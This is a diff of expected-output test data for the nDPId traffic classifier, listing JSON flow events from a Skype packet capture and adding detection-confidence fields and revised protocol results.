+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
